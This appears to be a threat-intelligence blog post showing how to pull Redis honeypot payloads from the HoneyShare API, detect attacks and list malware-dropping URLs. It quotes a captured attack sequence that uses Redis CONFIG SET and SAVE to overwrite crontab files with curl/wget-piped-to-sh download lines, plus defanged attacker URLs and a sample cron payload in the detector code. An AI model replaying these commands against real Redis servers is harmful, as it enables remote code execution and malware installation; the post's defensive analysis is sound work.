pedro [at] honeyshare [dot] live

Pedro Melgueira

Dissecting Redis Attacks with HoneyShare

It's surprising how much we can learn just by looking at what an attacker sends to an exposed Redis instance. Using only data from HoneyShare's honeypots we can:

  • List commands sent by attackers
  • Gather malicious URLs used for malware dropping
  • Collect malware samples

To start with this we must fetch some data.

Fetching Data

from honeyshare import HoneyShare

hs = HoneyShare(key=API_KEY)

# Get IPs that connect to port 6379, the default Redis port
honey_data = hs.Port(6379).ipv4(pagesize=100)

# Get the payload sent from those IPs
honey_payload = {}

for ip_meta in honey_data["IPv4"]:
    ip = ip_meta["IPv4"]

    payload_data = hs \
        .Port(6379)\
        .payload(ip, pagesize=50, base64_decode=True)

    honey_payload[ip] = [i["Bytes"] for i in payload_data["Connections"]]

The result is a dictionary mapping each IP to a list of payloads:

{'68.183.115.231': ['\r\n\r\n', '*1\r\n$4\r\ninfo\r\n', ... ],
 '183.136.170.208': ['*1\r\n$4\r\ninfo\r\n', '*1\r\n$7\r\nCOMMAND\r\n*4\r\n$6\r\nconfig\r\n...', ... ],
 ...
}

Filtering for HTTP

That's a lot of data in honey_payload, all resulting from connections to Redis from attackers and scanners. A lot can be explored there, but in this experiment we want to look for URLs.

def has_strs(payload, strs):
    """Print the payload if it contains any of the given strings (case-insensitive)."""
    payload_low = payload.lower()
    if any(s.lower() in payload_low for s in strs):
        print(payload)

for ip, payload_list in honey_payload.items():
    for payload in payload_list:
        has_strs(payload, ["http"])
...
set
$7
backup1
$70
*/2 * * * * cd1 -fsSL hxxp://79.137.195.151/cleanfda/init.sh | sh
*3
$3
set
$7
...

Example

We get some entries that contain HTTP. Taking one of them and cleaning it up a bit we get:

COMMAND
config set dbfilename backup.db
save config
set stop-writes-on-bgsave-error no
flushall
set backup1 \n\n\n*/2 * * * * cd1 -fsSL hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup2 \n\n\n*/3 * * * * wget -q -O- hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup3 \n\n\n*/4 * * * * curl -fsSL hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
set backup4 \n\n\n*/5 * * * * wd1 -q -O- hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
config set dir /var/spool/cron/
config set dbfilename root
save
config set dir /var/spool/cron/crontabs
save
flushall
set backup1 \n\n\n*/2 * * * * root cd1 -fsSL hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup2 \n\n\n*/3 * * * * root wget -q -O- hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup3 \n\n\n*/4 * * * * root curl -fsSL hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
set backup4 \n\n\n*/5 * * * * root wd1 -q -O- hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
config set dir /etc/cron.d/
config set dbfilename zzh
save
config set dir /etc/
config set dbfilename crontab
save

This is a list of commands sent to Redis. The pattern can be found several times in HoneyShare data, but the basic idea is that Redis is told to write its database dump into cron locations (CONFIG SET dir and dbfilename followed by SAVE), so the crontab files are overwritten from within Redis with entries that call wget and curl. These calls download shell scripts and execute them.
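The captured payloads are RESP arrays (the `*1\r\n$4\r\ninfo\r\n` framing shown earlier), so a defender can decode them into commands and flag exactly the sequence above: CONFIG SET dir/dbfilename pointing into a cron location, then SAVE. This is an added example, not HoneyShare code; the sample session, the TEST-NET URL and the list of cron paths are constructed assumptions.

```python
import re

CRON_PATHS = ("/var/spool/cron", "/etc/cron.d", "/etc/crontab")  # assumed watch list
URL_RE = re.compile(r"https?://[^\s\"'|]+")

def resp(*args):
    """Encode one command as a RESP array, the framing seen in the captures."""
    return f"*{len(args)}\r\n" + "".join(f"${len(a)}\r\n{a}\r\n" for a in args)

def parse_resp(payload):
    """Split a captured payload into commands (argument lists). Bulk strings are
    read by declared length, so embedded newlines survive; non-arrays are skipped."""
    cmds, pos = [], 0
    while (end := payload.find("\r\n", pos)) >= 0:
        head, pos = payload[pos:end], end + 2
        if not (head.startswith("*") and head[1:].isdigit()):
            continue  # e.g. the bare "\r\n\r\n" probes in the captures
        args = []
        for _ in range(int(head[1:])):
            end = payload.find("\r\n", pos)
            hdr = payload[pos:end] if end >= 0 else ""
            if not (hdr.startswith("$") and hdr[1:].isdigit()):
                args = None  # malformed bulk string: drop this array
                break
            start, length = end + 2, int(hdr[1:])
            args.append(payload[start:start + length])
            pos = start + length + 2
        if args:
            cmds.append(args)
    return cmds

def classify(cmds):
    """Return (cron_abuse, urls); cron_abuse is True once SAVE targets a cron path."""
    cfg, abuse, urls = {"dir": "", "dbfilename": "dump.rdb"}, False, set()
    for args in cmds:
        name = args[0].lower()
        if name == "config" and len(args) == 4 and args[1].lower() == "set":
            cfg[args[2].lower()] = args[3]
        elif name == "save":
            target = cfg["dir"].rstrip("/") + "/" + cfg["dbfilename"]
            abuse = abuse or target.startswith(CRON_PATHS)
        urls.update(u for a in args for u in URL_RE.findall(a))
    return abuse, urls

# Constructed sample session (TEST-NET address, not a real indicator).
CRON_LINE = "\n\n*/2 * * * * curl -fsSL http://198.51.100.7/example/init.sh | sh\n\n"
SAMPLE = ("\r\n\r\n" + resp("info") + resp("config", "set", "dir", "/var/spool/cron/")
          + resp("config", "set", "dbfilename", "root") + resp("set", "backup1", CRON_LINE) + resp("save"))
BENIGN = resp("info") + resp("config", "set", "dir", "/tmp") + resp("save")
```

Running `classify(parse_resp(SAMPLE))` flags the session and yields the embedded URL, while the BENIGN session is not flagged.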

Listing URLs

With this notion we can now quickly get a list of every URL sent to Redis honeypots.

import re

# Regular expression for http and https URLs
pattern = r'(http(s)?://[^ ]*)'
urls = set()

for payload_list in honey_payload.values():
    for i in payload_list:
        # findall returns (whole match, optional "s") tuples; keep the whole match
        r = [g[0] for g in re.findall(pattern, i)]
        # Update set
        urls.update(r)

urls
{"hxxp://103.79.77.16/ep9TS2/ndt.sh",
 "hxxp://185.19.33.145/ep9TS2/ndt.sh",
 "hxxp://194.110.247.97/ep9TS2/ndt.sh",
 "hxxp://45.83.122.25/3nFTk7/init.sh",
 "hxxp://45.83.123.29/cleanfda/init.sh",
 "hxxp://45.89.52.41/ep9TS2/ndt.sh",
 "hxxp://79.137.195.151/cleanfda/init.sh",
 "hxxp://\\\\b.c\\l\\u-e\\.e\\u/t.sh\").read()\"",
 "hxxp://\\\\s.n\\a-c\\s.c\\om/t.sh\").read()\"",
 "hxxp://en2an.top/cleanfda/init.sh",
 "hxxp://etherx.jabber.org/streams'",
 "hxxp://natalstatus.org/ep9TS2/ndt.sh",
 "hxxp://pyats.top/3nFTk7/init.sh",
 "hxxps://104.164.55.217/ep9TS2/ndt.sh",
 "hxxps://about.censys.io/)\r\nContent-Length:",
 "hxxps://internet-measurement.com/)\r\nConnection:",
 "hxxps://matrix.masscan.cloud/ep9TS2/ndt.sh"}

Conclusion

Here we see how a quick analysis of HoneyShare data can yield:

  • Malicious IPs
  • Malicious URLs
  • Malware Samples

In the end, not every URL is malicious: a few of them belong to scanners, for example. But malicious items can be fetched quickly.

Learn more about HoneyShare, explore the API and library.